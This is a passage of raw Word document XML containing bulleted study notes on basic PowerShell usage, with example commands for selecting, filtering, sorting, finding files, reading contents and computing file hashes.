    <w:p w14:paraId="2B8F46FB" w14:textId="5DFF4C6F" w:rsidR="0060207F" w:rsidRPr="0084205E" w:rsidRDefault="0060207F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Objects will contain methods and properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262434A3" w14:textId="39887C76" w:rsidR="0060207F" w:rsidRPr="0084205E" w:rsidRDefault="0060207F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Methods are functions that can be applied to output from the cmdlets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441B9994" w14:textId="0ED0260B" w:rsidR="0060207F" w:rsidRPr="0084205E" w:rsidRDefault="0060207F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Properties are variables in the output from a cmdlet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62501E1B" w14:textId="22910223" w:rsidR="0060207F" w:rsidRPr="0084205E" w:rsidRDefault="0060207F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To view, pass the output of a cmdlet to the Get-member cmdlet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300BAC6B" w14:textId="79CD00C5" w:rsidR="0060207F" w:rsidRPr="0084205E" w:rsidRDefault="0060207F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Syntax. Verb-Noun | Get-Member</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A376C8" w14:textId="463FE6B6" w:rsidR="0060207F" w:rsidRPr="0084205E" w:rsidRDefault="0060207F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ex. Get-Command | Get-Member -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>MemberType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C82A7E4" w14:textId="012A0A1A" w:rsidR="0060207F" w:rsidRPr="0084205E" w:rsidRDefault="0060207F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Creating Objects </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>From</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> Previous cmdlets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D229C3" w14:textId="0BB7D2F2" w:rsidR="0060207F" w:rsidRPr="0084205E" w:rsidRDefault="0048535F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Pulling out the properties from the output of a cmdlet and creating a new object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26244D9B" w14:textId="251A9B0F" w:rsidR="0048535F" w:rsidRPr="0084205E" w:rsidRDefault="0048535F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Done with Select-Object cmdlet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BB514A" w14:textId="57AA114B" w:rsidR="0048535F" w:rsidRPr="0084205E" w:rsidRDefault="0048535F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ex. Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ChildItem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> | Select-Object -Property Mode, Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32663EC4" w14:textId="66328264" w:rsidR="0048535F" w:rsidRPr="0084205E" w:rsidRDefault="0048535F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Additional flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC12885" w14:textId="549306CD" w:rsidR="0048535F" w:rsidRPr="0084205E" w:rsidRDefault="0048535F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>First – gets the first x object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2778C4A9" w14:textId="769264A2" w:rsidR="0048535F" w:rsidRPr="0084205E" w:rsidRDefault="0048535F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Last – gets the last x object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692BA398" w14:textId="44E829ED" w:rsidR="0048535F" w:rsidRPr="0084205E" w:rsidRDefault="0048535F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Unique – shows the unique objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199D3501" w14:textId="32E7E91F" w:rsidR="0048535F" w:rsidRPr="0084205E" w:rsidRDefault="0048535F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Skip – skips x objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E71BF0" w14:textId="3024CAFD" w:rsidR="0048535F" w:rsidRPr="0084205E" w:rsidRDefault="0048535F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Filtering Objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8C235B" w14:textId="79A78742" w:rsidR="0048535F" w:rsidRPr="0084205E" w:rsidRDefault="0048535F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To select objects that match a very specific value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFCF9F8" w14:textId="7C255417" w:rsidR="0048535F" w:rsidRPr="0084205E" w:rsidRDefault="0048535F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Where-Object to filter based on value of properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B942A6" w14:textId="33C7C400" w:rsidR="0048535F" w:rsidRPr="0084205E" w:rsidRDefault="0048535F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Syntax – Verb-Noun | Where-Object -Property </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>PropertyName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -operator Value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B70693" w14:textId="064BF116" w:rsidR="0048535F" w:rsidRPr="0084205E" w:rsidRDefault="0048535F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Syntax – Verb-Noun | Where-Object {$</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>_.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>PropertyName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – operator Value}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6C8128" w14:textId="1BE8BAFD" w:rsidR="0048535F" w:rsidRPr="0084205E" w:rsidRDefault="0048535F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>This version uses $_ operator to iterate through every object passed to the Where-Object cmdlet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5A3A2D" w14:textId="17A15CBD" w:rsidR="0048535F" w:rsidRPr="0084205E" w:rsidRDefault="0048535F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-operator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246F829F" w14:textId="3D889E3B" w:rsidR="0048535F" w:rsidRPr="0084205E" w:rsidRDefault="0048535F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-Contains – any item in property value is exact match for specified value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E085D8D" w14:textId="4908AE47" w:rsidR="0048535F" w:rsidRPr="0084205E" w:rsidRDefault="0048535F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-EQ - property value is same as specified value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36572A90" w14:textId="59C466CC" w:rsidR="0048535F" w:rsidRPr="0084205E" w:rsidRDefault="0048535F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-GT – property value is greater than the specified value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA87B5F" w14:textId="5872BFFC" w:rsidR="00BA61A6" w:rsidRPr="0084205E" w:rsidRDefault="00BA61A6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Additional operators available through research</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453C02B5" w14:textId="5CDD3CDE" w:rsidR="00BA61A6" w:rsidRPr="0084205E" w:rsidRDefault="00BA61A6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ex. Get-Service | Where-Object -Property Status -eq Stopped</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E74E7CB" w14:textId="6B50CE1E" w:rsidR="00BA61A6" w:rsidRPr="0084205E" w:rsidRDefault="00BA61A6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Sort Objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16004A3D" w14:textId="0223F03A" w:rsidR="00BA61A6" w:rsidRPr="0084205E" w:rsidRDefault="00BA61A6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Can sort cmdlet output efficiently by pipelining the output of a cmdlet to the Sort-Object cmdlet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C389E9" w14:textId="71B774D7" w:rsidR="00BA61A6" w:rsidRPr="0084205E" w:rsidRDefault="00BA61A6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Syntax – Verb-Noun | Sort-Object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260A5651" w14:textId="29C750AB" w:rsidR="00BA61A6" w:rsidRPr="0084205E" w:rsidRDefault="00BA61A6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ex. Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ChildItem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> | Sort-Object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6E6F22" w14:textId="7A7C3ABC" w:rsidR="00BA61A6" w:rsidRPr="0084205E" w:rsidRDefault="00BA61A6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Practical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE645B2" w14:textId="5534218C" w:rsidR="00BA61A6" w:rsidRPr="0084205E" w:rsidRDefault="00BA61A6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To find a file with a given name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF7D00D" w14:textId="05455BE1" w:rsidR="00BA61A6" w:rsidRPr="0084205E" w:rsidRDefault="00D12115" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ChildItem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -Path C:\ -Include *filename* -File -Recurse -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ErrorAction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>SilentlyContinue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="50E270EC" w14:textId="56A4A5A9" w:rsidR="00D12115" w:rsidRPr="0084205E" w:rsidRDefault="00D12115" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ChildItem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -Path C:\ -Include *filename* -Recurse | Select-Object -Property </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>FullName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="057420B6" w14:textId="14E23301" w:rsidR="00D12115" w:rsidRPr="0084205E" w:rsidRDefault="00D12115" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To specify contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CB6197" w14:textId="3A777F4E" w:rsidR="00D12115" w:rsidRPr="0084205E" w:rsidRDefault="00D12115" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Get-Content -Path “C:\Program Files\interesting-file.txt.txt”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155B9F64" w14:textId="7EF7F379" w:rsidR="00D12115" w:rsidRPr="0084205E" w:rsidRDefault="007F2361" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To detect how many cmdlets are installed on the system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09445EAC" w14:textId="3E9E067D" w:rsidR="007F2361" w:rsidRPr="0084205E" w:rsidRDefault="007F2361" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Get-Command -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>CommandType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> Cmdlet | Measure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6BB40A" w14:textId="2A852551" w:rsidR="007F2361" w:rsidRPr="0084205E" w:rsidRDefault="007F2361" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Commandtype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> specifies cmdlets only, not counting functions and aliases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F56EDD" w14:textId="500FDBC5" w:rsidR="007F2361" w:rsidRPr="0084205E" w:rsidRDefault="007F2361" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To get hash of a specific file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6F021D" w14:textId="7E1FE25F" w:rsidR="007F2361" w:rsidRPr="0084205E" w:rsidRDefault="007F2361" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>FileHash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -Algorithm MD5 -Path “C:\Program Files\interesting-file.txt.txt”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283C645A" w14:textId="5EEC57AF" w:rsidR="007F2361" w:rsidRPr="0084205E" w:rsidRDefault="007F2361" w:rsidP="0084205E">
      <w:pPr>
